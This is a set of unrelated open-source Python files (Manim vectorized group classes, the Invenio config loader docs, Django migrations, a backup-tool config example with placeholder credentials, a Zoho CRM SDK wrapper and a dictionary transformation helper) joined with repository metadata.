class VGroup(VMobject):
"""A group of vectorized mobjects.
This can be used to group multiple :class:`~.VMobject` instances together
in order to scale, move, ... them together.
Examples
--------
To add :class:`~.VMobject`s to a :class:`~.VGroup`, you can either use the
:meth:`~.VGroup.add` method, or use the `+` and `+=` operators. Similarly, you
can subtract elements of a VGroup via :meth:`~.VGroup.remove` method, or
`-` and `-=` operators:
>>> from manim import Triangle, Square, VGroup
>>> vg = VGroup()
>>> triangle, square = Triangle(), Square()
>>> vg.add(triangle)
VGroup(Triangle)
>>> vg + square # a new VGroup is constructed
VGroup(Triangle, Square)
>>> vg # not modified
VGroup(Triangle)
>>> vg += square; vg # modifies vg
VGroup(Triangle, Square)
>>> vg.remove(triangle)
VGroup(Square)
>>> vg - square; # a new VGroup is constructed
VGroup()
>>> vg # not modified
VGroup(Square)
>>> vg -= square; vg # modifies vg
VGroup()
.. manim:: ArcShapeIris
:save_last_frame:
class ArcShapeIris(Scene):
def construct(self):
colors = [DARK_BROWN, BLUE_E, BLUE_D, BLUE_A, TEAL_B, GREEN_B, YELLOW_E]
radius = [1 + rad * 0.1 for rad in range(len(colors))]
circles_group = VGroup()
# zip(radius, colors) makes the iterator [(radius[i], colors[i]) for i in range(len(radius))]
circles_group.add(*[Circle(radius=rad, stroke_width=10, color=col)
for rad, col in zip(radius, colors)])
self.add(circles_group)
"""
def __init__(self, *vmobjects, **kwargs):
VMobject.__init__(self, **kwargs)
self.add(*vmobjects)
def __repr__(self):
return (
self.__class__.__name__
+ "("
+ ", ".join(str(mob) for mob in self.submobjects)
+ ")"
)
def __str__(self):
return (
f"{self.__class__.__name__} of {len(self.submobjects)} "
f"submobject{'s' if len(self.submobjects) > 0 else ''}"
)
def add(self, *vmobjects):
"""Checks if all passed elements are an instance of VMobject and then add them to submobjects
Parameters
----------
vmobjects : :class:`~.VMobject`
List of VMobject to add
Returns
-------
:class:`VGroup`
Raises
------
TypeError
If one element of the list is not an instance of VMobject
Examples
--------
.. manim:: AddToVGroup
class AddToVGroup(Scene):
def construct(self):
circle_red = Circle(color=RED)
circle_green = Circle(color=GREEN)
circle_blue = Circle(color=BLUE)
circle_red.shift(LEFT)
circle_blue.shift(RIGHT)
gr = VGroup(circle_red, circle_green)
gr2 = VGroup(circle_blue) # Constructor uses add directly
self.add(gr,gr2)
self.wait()
gr += gr2 # Add group to another
self.play(
gr.animate.shift(DOWN),
)
gr -= gr2 # Remove group
self.play( # Animate groups separately
gr.animate.shift(LEFT),
gr2.animate.shift(UP),
)
self.play( #Animate groups without modification
(gr+gr2).animate.shift(RIGHT)
)
self.play( # Animate group without component
(gr-circle_red).animate.shift(RIGHT)
)
"""
if not all(isinstance(m, VMobject) for m in vmobjects):
raise TypeError("All submobjects must be of type VMobject")
return super().add(*vmobjects)
def __add__(self, vmobject):
return VGroup(*self.submobjects, vmobject)
def __iadd__(self, vmobject):
return self.add(vmobject)
def __sub__(self, vmobject):
copy = VGroup(*self.submobjects)
copy.remove(vmobject)
return copy
def __isub__(self, vmobject):
return self.remove(vmobject)
class VDict(VMobject):
"""A VGroup-like class, also offering submobject access by
key, like a python dict
Parameters
----------
mapping_or_iterable : Union[:class:`Mapping`, Iterable[Tuple[Hashable, :class:`~.VMobject`]]], optional
The parameter specifying the key-value mapping of keys and mobjects.
show_keys : :class:`bool`, optional
Whether to also display the key associated with
the mobject. This might be useful when debugging,
especially when there are a lot of mobjects in the
:class:`VDict`. Defaults to False.
kwargs : Any
Other arguments to be passed to `Mobject`.
Attributes
----------
show_keys : :class:`bool`
Whether to also display the key associated with
the mobject. This might be useful when debugging,
especially when there are a lot of mobjects in the
:class:`VDict`. When displayed, the key is towards
the left of the mobject.
Defaults to False.
submob_dict : :class:`dict`
Is the actual python dictionary that is used to bind
the keys to the mobjects.
Examples
--------
.. manim:: ShapesWithVDict
class ShapesWithVDict(Scene):
def construct(self):
square = Square().set_color(RED)
circle = Circle().set_color(YELLOW).next_to(square, UP)
# create dict from list of tuples each having key-mobject pair
pairs = [("s", square), ("c", circle)]
my_dict = VDict(pairs, show_keys=True)
# display it just like a VGroup
self.play(Create(my_dict))
self.wait()
text = Tex("Some text").set_color(GREEN).next_to(square, DOWN)
# add a key-value pair by wrapping it in a single-element list of tuple
# after attrs branch is merged, it will be easier like `.add(t=text)`
my_dict.add([("t", text)])
self.wait()
rect = Rectangle().next_to(text, DOWN)
# can also do key assignment like a python dict
my_dict["r"] = rect
# access submobjects like a python dict
my_dict["t"].set_color(PURPLE)
self.play(my_dict["t"].animate.scale(3))
self.wait()
# also supports python dict styled reassignment
my_dict["t"] = Tex("Some other text").set_color(BLUE)
self.wait()
# remove submobject by key
my_dict.remove("t")
self.wait()
self.play(Uncreate(my_dict["s"]))
self.wait()
self.play(FadeOut(my_dict["c"]))
self.wait()
self.play(FadeOut(my_dict["r"], shift=DOWN))
self.wait()
# you can also make a VDict from an existing dict of mobjects
plain_dict = {
1: Integer(1).shift(DOWN),
2: Integer(2).shift(2 * DOWN),
3: Integer(3).shift(3 * DOWN),
}
vdict_from_plain_dict = VDict(plain_dict)
vdict_from_plain_dict.shift(1.5 * (UP + LEFT))
self.play(Create(vdict_from_plain_dict))
# you can even use zip
vdict_using_zip = VDict(zip(["s", "c", "r"], [Square(), Circle(), Rectangle()]))
vdict_using_zip.shift(1.5 * RIGHT)
self.play(Create(vdict_using_zip))
self.wait()
"""
def __init__(self, mapping_or_iterable={}, show_keys=False, **kwargs):
VMobject.__init__(self, **kwargs)
self.show_keys = show_keys
self.submob_dict = {}
self.add(mapping_or_iterable)
def __repr__(self):
return __class__.__name__ + "(" + repr(self.submob_dict) + ")"
def add(self, mapping_or_iterable):
"""Adds the key-value pairs to the :class:`VDict` object.
Also, it internally adds the value to the `submobjects` :class:`list`
of :class:`~.Mobject`, which is responsible for actual on-screen display.
Parameters
----------
mapping_or_iterable : Union[:class:`Mapping`, Iterable[Tuple[Hashable, :class:`~.VMobject`]]], optional
The parameter specifying the key-value mapping of keys and mobjects.
Returns
-------
:class:`VDict`
Returns the :class:`VDict` object on which this method was called.
Examples
--------
Normal usage::
square_obj = Square()
my_dict.add([('s', square_obj)])
"""
for key, value in dict(mapping_or_iterable).items():
self.add_key_value_pair(key, value)
return self
def remove(self, key):
"""Removes the mobject from the :class:`VDict` object having the key `key`
Also, it internally removes the mobject from the `submobjects` :class:`list`
of :class:`~.Mobject`, (which is responsible for removing it from the screen)
Parameters
----------
key : :class:`typing.Hashable`
The key of the submobject to be removed.
Returns
-------
:class:`VDict`
Returns the :class:`VDict` object on which this method was called.
Examples
--------
Normal usage::
my_dict.remove('square')
"""
if key not in self.submob_dict:
raise KeyError("The given key '%s' is not present in the VDict" % str(key))
super().remove(self.submob_dict[key])
del self.submob_dict[key]
return self
def __getitem__(self, key):
"""Override the [] operator for item retrieval.
Parameters
----------
key : :class:`typing.Hashable`
The key of the submobject to be accessed
Returns
-------
:class:`VMobject`
The submobject corresponding to the key `key`
Examples
--------
Normal usage::
self.play(Create(my_dict['s']))
"""
submob = self.submob_dict[key]
return submob
def __setitem__(self, key, value):
"""Override the [] operator for item assignment.
Parameters
----------
key : :class:`typing.Hashable`
The key of the submobject to be assigned
value : :class:`VMobject`
The submobject to bind the key to
Returns
-------
None
Examples
--------
Normal usage::
square_obj = Square()
my_dict['sq'] = square_obj
"""
if key in self.submob_dict:
self.remove(key)
self.add([(key, value)])
def __delitem__(self, key):
"""Override the del operator for deleting an item.
Parameters
----------
key : :class:`typing.Hashable`
The key of the submobject to be deleted
Returns
-------
None
Examples
--------
::
>>> from manim import *
>>> my_dict = VDict({'sq': Square()})
>>> 'sq' in my_dict
True
>>> del my_dict['sq']
>>> 'sq' in my_dict
False
Notes
-----
Removing an item from a VDict does not remove that item from any Scene
that the VDict is part of.
"""
del self.submob_dict[key]
def __contains__(self, key):
"""Override the in operator.
Parameters
----------
key : :class:`typing.Hashable`
The key to check membership of.
Returns
-------
:class:`bool`
Examples
--------
::
>>> from manim import *
>>> my_dict = VDict({'sq': Square()})
>>> 'sq' in my_dict
True
"""
return key in self.submob_dict
def get_all_submobjects(self):
"""To get all the submobjects associated with a particular :class:`VDict` object
Returns
-------
:class:`dict_values`
All the submobjects associated with the :class:`VDict` object
Examples
--------
Normal usage::
for submob in my_dict.get_all_submobjects():
self.play(Create(submob))
"""
submobjects = self.submob_dict.values()
return submobjects
def add_key_value_pair(self, key, value):
"""A utility function used by :meth:`add` to add the key-value pair
to :attr:`submob_dict`. Not really meant to be used externally.
Parameters
----------
key : :class:`typing.Hashable`
The key of the submobject to be added.
value : :class:`~.VMobject`
The mobject associated with the key
Returns
-------
None
Raises
------
TypeError
If the value is not an instance of VMobject
Examples
--------
Normal usage::
square_obj = Square()
self.add_key_value_pair('s', square_obj)
"""
if not isinstance(value, VMobject):
raise TypeError("All submobjects must be of type VMobject")
mob = value
if self.show_keys:
# This import is here and not at the top to avoid circular import
from ...mobject.svg.tex_mobject import Tex
key_text = Tex(str(key)).next_to(value, LEFT)
mob.add(key_text)
self.submob_dict[key] = mob
super().add(value)
class VectorizedPoint(metaclass=MetaVMobject):
def __init__(
self,
location=ORIGIN,
color=BLACK,
fill_opacity=0,
stroke_width=0,
artificial_width=0.01,
artificial_height=0.01,
**kwargs,
):
self.artificial_width = artificial_width
self.artificial_height = artificial_height
super().__init__(
color=color,
fill_opacity=fill_opacity,
stroke_width=stroke_width,
**kwargs,
)
self.set_points(np.array([location]))
basecls = OpenGLVMobject if config.renderer == "opengl" else VMobject
@basecls.width.getter
def width(self):
return self.artificial_width
@basecls.height.getter
def height(self):
return self.artificial_height
def get_location(self):
return np.array(self.points[0])
def set_location(self, new_loc):
self.set_points(np.array([new_loc]))
class CurvesAsSubmobjects(VGroup):
"""Convert a curve's elements to submobjects.
Examples
--------
.. manim:: LineGradientExample
:save_last_frame:
class LineGradientExample(Scene):
def construct(self):
curve = ParametricFunction(lambda t: [t, np.sin(t), 0], t_min=-PI, t_max=PI, stroke_width=10)
new_curve = CurvesAsSubmobjects(curve)
new_curve.set_color_by_gradient(BLUE, RED)
self.add(new_curve.shift(UP), curve)
"""
def __init__(self, vmobject, **kwargs):
VGroup.__init__(self, **kwargs)
tuples = vmobject.get_cubic_bezier_tuples()
for tup in tuples:
part = VMobject()
part.set_points(tup)
part.match_style(vmobject)
self.add(part)
class DashedVMobject(metaclass=MetaVMobject):
def __init__(
self, vmobject, num_dashes=15, positive_space_ratio=0.5, color=WHITE, **kwargs
):
self.num_dashes = num_dashes
self.positive_space_ratio = positive_space_ratio
super().__init__(color=color, **kwargs)
ps_ratio = self.positive_space_ratio
if num_dashes > 0:
# End points of the unit interval for division
alphas = np.linspace(0, 1, num_dashes + 1)
# This determines the length of each "dash"
full_d_alpha = 1.0 / num_dashes
partial_d_alpha = full_d_alpha * ps_ratio
# Shifts the alphas and removes the last dash
# to give closed shapes even spacing
if vmobject.is_closed():
alphas += partial_d_alpha / 2
alphas = np.delete(alphas, -1)
# Rescale so that the last point of vmobject will
# be the end of the last dash
else:
alphas /= 1 - full_d_alpha + partial_d_alpha
self.add(
*[
vmobject.get_subcurve(alpha, alpha + partial_d_alpha)
for alpha in alphas[:-1]
]
)
# Family is already taken care of by get_subcurve
# implementation
if config.renderer == "opengl":
self.match_style(vmobject, recurse=False)
else:
self.match_style(vmobject, family=False)
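# A minimal usage sketch for the dashed wrapper above (Circle is assumed to be
# importable from the geometry module, as elsewhere in the library):
#
#   circle = Circle()
#   dashed = DashedVMobject(circle, num_dashes=30, positive_space_ratio=0.6)
#
# Each dash is a subcurve of the original mobject, so the dashed copy keeps
# the original's style without recursing into its submobjects.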
| 34.297722
| 266
| 0.585831
|
514ba03cc63ab809bf94dc1ed018cf092b5aec5b
| 6,731
|
py
|
Python
|
invenio_config/__init__.py
|
invenio-toaster/invenio-config
|
ed5d2a30bdfceb030b8364dbdcb2c239bc340969
|
[
"MIT"
] | 4
|
2015-10-12T07:26:57.000Z
|
2017-10-22T00:30:54.000Z
|
invenio_config/__init__.py
|
invenio-toaster/invenio-config
|
ed5d2a30bdfceb030b8364dbdcb2c239bc340969
|
[
"MIT"
] | 28
|
2015-10-12T14:54:50.000Z
|
2020-12-03T15:02:17.000Z
|
invenio_config/__init__.py
|
invenio-toaster/invenio-config
|
ed5d2a30bdfceb030b8364dbdcb2c239bc340969
|
[
"MIT"
] | 25
|
2015-10-07T16:20:54.000Z
|
2021-11-25T09:42:43.000Z
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Invenio configuration loader.
Invenio-Config is a *base package* of the Invenio digital library framework.
It is usually installed automatically as a dependency. It should facilitate
configuration loading from various sources to an application instance.
The following configuration loaders exist:
- :py:data:`invenio_config.default.InvenioConfigDefault` - ensure required
configuration values are set.
- :py:data:`invenio_config.module.InvenioConfigModule` - for loading
configuration from a Python module.
- :py:data:`invenio_config.entrypoint.InvenioConfigEntryPointModule` - for
loading configuration from a Python module specified by an entry point (by
default ``invenio_config.module``).
- :py:data:`invenio_config.folder.InvenioConfigInstanceFolder` - for loading
configuration from ``cfg`` file in an instance folder.
- :py:data:`invenio_config.env.InvenioConfigEnvironment` - for loading
configuration from environment variables with defined prefix (e.g.
``INVENIO_SECRET_KEY``).
It also includes a configuration loader factory that is used to merge these
sources in a predefined order, ensuring correct behavior in common scenarios.
Initialization
--------------
The following example needs a writable instance folder, hence we start by creating
a temporary directory.
>>> import tempfile
>>> tmppath = tempfile.mkdtemp()
.. testcode::
:hide:
import atexit
import shutil
atexit.register(lambda: shutil.rmtree(tmppath))
Now we can create a Flask application:
>>> from flask import Flask
>>> app = Flask('myapp', instance_path=tmppath, instance_relative_config=True)
Loaders
-------
You can check default configuration values in newly created ``app``.
>>> 'DEBUG' in app.config
True
>>> app.config.get('SECRET_KEY') is None
True
Default
~~~~~~~
The default configuration loader makes sure that the required configuration
values are always loaded. You should call it **after** all other configuration
loaders have already been called.
The following default configuration values exist:
- :py:data:`SECRET_KEY` - A secret key that will be used for securely signing
the session cookie and can be used for any other security related needs.
- :py:data:`~invenio_config.default.ALLOWED_HTML_TAGS` - allowed tags used for
html sanitizing by bleach.
- :py:data:`~invenio_config.default.ALLOWED_HTML_ATTRS` - allowed attributes
used for html sanitizing by bleach.
The default configuration loader will warn if the ``SECRET_KEY`` is not
defined:
>>> import warnings
>>> from invenio_config import InvenioConfigDefault
>>> with warnings.catch_warnings(record=True) as w:
... config_default = InvenioConfigDefault(app=app)
... assert len(w) == 1
>>> app.config['SECRET_KEY']
'CHANGE_ME'
Module
~~~~~~
The module loader accepts an object and proxies the call to
:meth:`flask.Config.from_object`.
Here is an example of a configuration object:
>>> class Config:
... EXAMPLE = 'module'
>>> from invenio_config import InvenioConfigModule
>>> config_module = InvenioConfigModule(app=app, module=Config)
>>> app.config['EXAMPLE']
'module'
Entry point
~~~~~~~~~~~
The entry point loader works similarly to the module loader; it just loads the
config module from the entry point ``invenio_config.module``:
>>> from invenio_config import InvenioConfigEntryPointModule
>>> config_ep = InvenioConfigEntryPointModule(app=app)
Instance Folder
~~~~~~~~~~~~~~~
The runtime configuration should be stored in a separate file, ideally located
outside the actual application package. The configuration files are handled
as Python files where only variables in uppercase are stored in the application
config.
>>> import os
>>> from invenio_config import InvenioConfigInstanceFolder
>>> with open(os.path.join(tmppath, 'myapp.cfg'), 'w') as f:
... result = f.write("EXAMPLE = 'instance folder'")
>>> config_instance_folder = InvenioConfigInstanceFolder(app=app)
>>> app.config['EXAMPLE']
'instance folder'
Environment
~~~~~~~~~~~
Using environment variables is very handy when it comes to configuring
connections to services like database, Redis server, RabbitMQ, etc. used via
containers (e.g. Docker). In order to protect your application from reading
environment variables set by the system or other applications, you should
define a variable prefix used by the loader.
>>> os.environ['MYAPP_EXAMPLE'] = 'environment'
>>> from invenio_config import InvenioConfigEnvironment
>>> config_environment = InvenioConfigEnvironment(app=app, prefix='MYAPP_')
>>> app.config['EXAMPLE']
'environment'
You can also set more complex Python literal variables (e.g. dictionaries or
lists):
>>> os.environ['MYAPP_COMPLEX'] = "{'items': [{'num': 42}, {'foo': 'bar'}]}"
>>> # ...or export MYAPP_COMPLEX="{'items': [{'num': 42}, {'foo': 'bar'}]}"
>>> config_environment = InvenioConfigEnvironment(app=app, prefix='MYAPP_')
>>> app.config['COMPLEX']
{'items': [{'num': 42}, {'foo': 'bar'}]}
Factory Pattern
---------------
Invenio-Config comes with an opinionated way of loading configuration
that combines loaders in a predictable way. You can use
:func:`invenio_config.utils.create_config_loader` if you would like to:
1. Load configuration from ``invenio_config.module`` entry point group.
2. Load configuration from ``config`` module if provided as argument.
3. Load configuration from the instance folder:
``<app.instance_path>/<app.name>.cfg``.
4. Load the configuration keyword arguments provided.
5. Load configuration from environment variables with the prefix
``env_prefix``.
>>> from invenio_config import create_config_loader
>>> app = Flask('myapp', instance_path=tmppath, instance_relative_config=True)
>>> config_loader = create_config_loader(config=Config, env_prefix='MYAPP')
>>> config_loader(app=app, MYARG='config loader')
>>> app.config['EXAMPLE']
'environment'
>>> app.config['MYARG']
'config loader'
"""
from __future__ import absolute_import, print_function
from .default import InvenioConfigDefault
from .entrypoint import InvenioConfigEntryPointModule
from .env import InvenioConfigEnvironment
from .folder import InvenioConfigInstanceFolder
from .module import InvenioConfigModule
from .utils import create_conf_loader, create_config_loader
from .version import __version__
__all__ = (
'__version__',
'InvenioConfigDefault',
'InvenioConfigEntryPointModule',
'InvenioConfigEnvironment',
'InvenioConfigInstanceFolder',
'InvenioConfigModule',
'create_conf_loader',
'create_config_loader',
)
| 34.695876
| 79
| 0.756797
|
f8ac8655d090ff92d2b25abc70dca58017a2f82d
| 792
|
py
|
Python
|
app/migrations/0011_auto_20171212_1655.py
|
nevooronni/RideAlong
|
0921c0b77d7fbc4c9595d497648f5b40e2d87000
|
[
"MIT"
] | 1
|
2019-01-24T01:02:55.000Z
|
2019-01-24T01:02:55.000Z
|
app/migrations/0011_auto_20171212_1655.py
|
nevooronni/RideAlong
|
0921c0b77d7fbc4c9595d497648f5b40e2d87000
|
[
"MIT"
] | null | null | null |
app/migrations/0011_auto_20171212_1655.py
|
nevooronni/RideAlong
|
0921c0b77d7fbc4c9595d497648f5b40e2d87000
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.0 on 2017-12-12 13:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0010_auto_20171211_2354'),
]
operations = [
migrations.AlterField(
model_name='driverprofile',
name='gender',
field=models.TextField(blank=True, choices=[('Female', 'female'), ('Male', 'male'), ('Both', 'both'), ('None', 'non-specified')], default='None', max_length=50),
),
migrations.AlterField(
model_name='riderprofile',
name='gender',
field=models.CharField(blank=True, choices=[('Female', 'female'), ('Male', 'male'), ('Both', 'both'), ('None', 'non-specified')], default='None', max_length=30),
),
]
| 33
| 173
| 0.579545
|
a60cb361e13aa8af9a1d07f81d10939120a380f7
| 1,085
|
py
|
Python
|
configexample.py
|
sergioamorim/backup_manager
|
f581fd455d25c1b06d31802de013d22be7c1ed64
|
[
"MIT"
] | null | null | null |
configexample.py
|
sergioamorim/backup_manager
|
f581fd455d25c1b06d31802de013d22be7c1ed64
|
[
"MIT"
] | null | null | null |
configexample.py
|
sergioamorim/backup_manager
|
f581fd455d25c1b06d31802de013d22be7c1ed64
|
[
"MIT"
] | null | null | null |
from paramiko import RSAKey
ssh_client_options = {
'hosts_keys_filename': '/path/to/known_hosts',
}
routerboards = [
{
'name': 'router-identification',
'backup_options': {
'backups_directory': '/path/to/save/the/backup/files/with/trailing/slash/',
'assertion_options': {
'seconds_to_timeout': 10,
'minimum_size_in_bytes': 77
}
},
'backup_password': 'pass', # used to encrypt the .backup file
'credentials': {
'username': 'some_username',
'hostname': 'some_hostname_or_ip',
'port': 65535,
'pkey': RSAKey(filename='/path/to/private_key')
}
}
]
myauth = {
'backup_settings': {
'local_backups_directory': '/path/to/save/the/backup/files/with/trailing/slash/',
'remote_backups_directory': '/admin/backup/',
'keeping_backups_quantity': 7 # backups older than this number of days will be deleted from the server
},
'credentials': {
'username': 'some_username',
'hostname': 'some_hostname_or_ip',
'port': 65535,
'pkey': RSAKey(filename='/path/to/private_key')
}
}
| 27.125
| 107
| 0.645161
|
6fe56dcfbcfff4f3905e153e764bbeeed71f45c4
| 3,974
|
py
|
Python
|
approvals/migrations/0001_initial.py
|
xzzy/statdev
|
b2c3eb3ad4d8aab44d0f67fc526da1a69b4d86a2
|
[
"Apache-2.0"
] | null | null | null |
approvals/migrations/0001_initial.py
|
xzzy/statdev
|
b2c3eb3ad4d8aab44d0f67fc526da1a69b4d86a2
|
[
"Apache-2.0"
] | 7
|
2017-03-13T02:00:21.000Z
|
2018-01-02T04:03:02.000Z
|
approvals/migrations/0001_initial.py
|
xzzy/statdev
|
b2c3eb3ad4d8aab44d0f67fc526da1a69b4d86a2
|
[
"Apache-2.0"
] | 2
|
2017-02-16T02:18:21.000Z
|
2017-02-16T02:22:02.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2019-08-06 02:49
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('accounts', '0023_communicationslogentry_log_type'),
('applications', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Approval',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('app_type', models.IntegerField(choices=[(1, 'Permit'), (2, 'Licence/permit'), (3, 'Part 5'), (4, 'Emergency works'), (5, 'Part 5 - Amendment Request'), (6, 'Part 5 - Amendment Application'), (7, 'Test - Application'), (8, 'Amend Permit'), (9, 'Amend Licence'), (10, 'Renew Permit'), (11, 'Renew Licence')])),
('title', models.CharField(max_length=254)),
('issue_date', models.DateField(auto_now_add=True, null=True)),
('start_date', models.DateField(blank=True, null=True)),
('expiry_date', models.DateField(blank=True, null=True)),
('status', models.IntegerField(choices=[(1, 'Current'), (2, 'Expired'), (3, 'Cancelled'), (4, 'Surrendered'), (5, 'Suspended'), (6, 'Reinstate')])),
('suspend_from_date', models.DateField(blank=True, null=True)),
('suspend_to_date', models.DateField(blank=True, null=True)),
('reinstate_date', models.DateField(blank=True, null=True)),
('cancellation_date', models.DateField(blank=True, null=True)),
('surrender_date', models.DateField(blank=True, null=True)),
('details', models.TextField(blank=True, null=True)),
('ammendment_application', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='ammendment_application', to='applications.Application')),
('applicant', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='applicant_holder', to=settings.AUTH_USER_MODEL)),
('application', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='application', to='applications.Application')),
('approval_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='approval_document', to='applications.Record')),
('organisation', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, to='accounts.Organisation')),
],
),
migrations.CreateModel(
name='CommunicationApproval',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('comms_to', models.CharField(blank=True, max_length=256, null=True)),
('comms_from', models.CharField(blank=True, max_length=256, null=True)),
('subject', models.CharField(blank=True, max_length=256, null=True)),
('comms_type', models.IntegerField(choices=[(0, 'None'), (1, 'Phone'), (2, 'Email'), (3, 'Mail'), (4, 'System')], default=0)),
('details', models.TextField(blank=True, null=True)),
('state', models.IntegerField(blank=True, null=True)),
('created', models.DateTimeField(auto_now_add=True)),
('approval', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='approvals.Approval')),
('records', models.ManyToManyField(blank=True, related_name='communication_approvals_docs', to='applications.Record')),
],
),
]
| 66.233333
| 326
| 0.632109
|
24a35c650f2156510cfae50959664263b5147484
| 2,149
|
py
|
Python
|
zcrmsdk/src/com/zoho/crm/api/territories/response_wrapper.py
|
zoho/zohocrm-python-sdk-2.0
|
3a93eb3b57fed4e08f26bd5b311e101cb2995411
|
[
"Apache-2.0"
] | null | null | null |
zcrmsdk/src/com/zoho/crm/api/territories/response_wrapper.py
|
zoho/zohocrm-python-sdk-2.0
|
3a93eb3b57fed4e08f26bd5b311e101cb2995411
|
[
"Apache-2.0"
] | null | null | null |
zcrmsdk/src/com/zoho/crm/api/territories/response_wrapper.py
|
zoho/zohocrm-python-sdk-2.0
|
3a93eb3b57fed4e08f26bd5b311e101cb2995411
|
[
"Apache-2.0"
] | null | null | null |
try:
from zcrmsdk.src.com.zoho.crm.api.exception import SDKException
from zcrmsdk.src.com.zoho.crm.api.util import Constants
from zcrmsdk.src.com.zoho.crm.api.territories.response_handler import ResponseHandler
except Exception:
from ..exception import SDKException
from ..util import Constants
from .response_handler import ResponseHandler
class ResponseWrapper(ResponseHandler):
def __init__(self):
"""Creates an instance of ResponseWrapper"""
super().__init__()
self.__territories = None
self.__key_modified = dict()
def get_territories(self):
"""
The method to get the territories
Returns:
list: An instance of list
"""
return self.__territories
def set_territories(self, territories):
"""
The method to set the value to territories
Parameters:
territories (list) : An instance of list
"""
if territories is not None and not isinstance(territories, list):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: territories EXPECTED TYPE: list', None, None)
self.__territories = territories
self.__key_modified['territories'] = 1
def is_key_modified(self, key):
"""
The method to check if the user has modified the given key
Parameters:
key (string) : A string representing the key
Returns:
int: An int representing the modification
"""
if key is not None and not isinstance(key, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: key EXPECTED TYPE: str', None, None)
if key in self.__key_modified:
return self.__key_modified.get(key)
return None
def set_key_modified(self, key, modification):
"""
The method to mark the given key as modified
Parameters:
key (string) : A string representing the key
modification (int) : An int representing the modification
"""
if key is not None and not isinstance(key, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: key EXPECTED TYPE: str', None, None)
if modification is not None and not isinstance(modification, int):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: modification EXPECTED TYPE: int', None, None)
self.__key_modified[key] = modification
| 27.551282
| 100
| 0.741275
|
f07937b21d4b3652d451a10cb90fd13f131b8fbb
| 3,995
|
py
|
Python
|
management_layer/transformation.py
|
hedleyroos/core-management-layer
|
2a25bf5fb44fd511b8b2626ec09a4bc05098334c
|
[
"BSD-3-Clause"
] | null | null | null |
management_layer/transformation.py
|
hedleyroos/core-management-layer
|
2a25bf5fb44fd511b8b2626ec09a4bc05098334c
|
[
"BSD-3-Clause"
] | 90
|
2018-01-23T10:30:01.000Z
|
2019-01-31T10:53:42.000Z
|
management_layer/transformation.py
|
hedleyroos/core-management-layer
|
2a25bf5fb44fd511b8b2626ec09a4bc05098334c
|
[
"BSD-3-Clause"
] | 1
|
2021-08-17T14:16:23.000Z
|
2021-08-17T14:16:23.000Z
|
"""
This module defines classes that help to transform dictionaries.
Their purpose is to simplify mapping server classes to client classes and vice versa.
At a high level the following happens:
```
1. body_dict = request.get_json() # Read the request body as JSON, returning a dict
2. server_model = CreatePolicyServerModel.from_dict(body_dict) # The server
model needs to be created, since it does the validation
3. server_model_as_dict = server_model.to_dict()
4. client_model_dict = TheTransform.apply(server_model_as_dict)
5. client_model = CreatePolicyClientModel.from_dict(client_model_dict)
```
Note: Step 5 can also be written as
```
client_model = CreatePolicyClientModel(**client_model_dict)
```
The process for the response from the client is similar. The class returned
needs to be converted to a dictionary, transformed and used to construct the
server response class.
"""
import logging
LOGGER = logging.getLogger(__name__)
class Mapping(object):
"""
A class representing a mapping definition
The mapping will be applied to a dictionary field
"""
def __init__(self, input_field, output_field=None, conversion=None):
"""
:param input_field: The name of the field to transform
:param output_field: The name of the new field name that should be
used. If omitted, the name of the input field is used
:param conversion: A callable used to map the value. If None,
the value of the input field is copied verbatim.
"""
self.input_field = input_field
self.output_field = output_field or input_field
self.conversion = conversion
class Transformation(object):
"""
A transformation is a list of Mappings that can be applied to a dictionary.
"""
def __init__(self, mappings: [Mapping] = None,
copy_fields: [str] = None):
"""
:param mappings: Mappings for fields
:param copy_fields: Convenience mechanism for fields that should
only be copied.
"""
copy_fields = copy_fields or []
self._mappings = mappings or []
self._mappings.extend([Mapping(field) for field in copy_fields])
# Verify that there are no duplicate input field names specified
self._check_duplicates(
[mapping.input_field for mapping in self._mappings]
)
# Verify that there are no duplicate output field names specified
self._check_duplicates(
[mapping.output_field for mapping in self._mappings]
)
def apply(self, dictionary: dict) -> dict:
"""
Apply this transformation to the specified dictionary.
:param dictionary: The dictionary to transform
:return: The transformed dictionary
"""
result = {}
for mapping in self._mappings:
if mapping.input_field in dictionary:
value = dictionary[mapping.input_field]
if value is None:
continue
if mapping.conversion is not None:
try:
value = mapping.conversion(value)
except Exception as e:
msg = "Field mapping failed with '{}'\n" \
"Field: '{}'\n" \
"Value: '{}'\n" \
"Conversion: {}".format(e, mapping.input_field,
value, mapping.conversion)
LOGGER.error(msg)
raise RuntimeError(msg)
result[mapping.output_field] = value
return result
def _check_duplicates(self, names):
# Verify that there are no duplicate field names specified
seen = set()
for name in names:
if name in seen:
raise RuntimeError("Field '{}' specified more than "
"once".format(name))
seen.add(name)
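if __name__ == "__main__":  # pragma: no cover
    # Editor's usage sketch, not part of the original module: it maps a
    # server-side dictionary to a client-side one. The field names
    # "policy_id", "id" and "name" are illustrative only.
    demo_transformation = Transformation(
        mappings=[Mapping("policy_id", output_field="id", conversion=int)],
        copy_fields=["name"],
    )
    print(demo_transformation.apply({"policy_id": "42", "name": "admin"}))
    # Prints: {'id': 42, 'name': 'admin'}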
| 36.651376
| 84
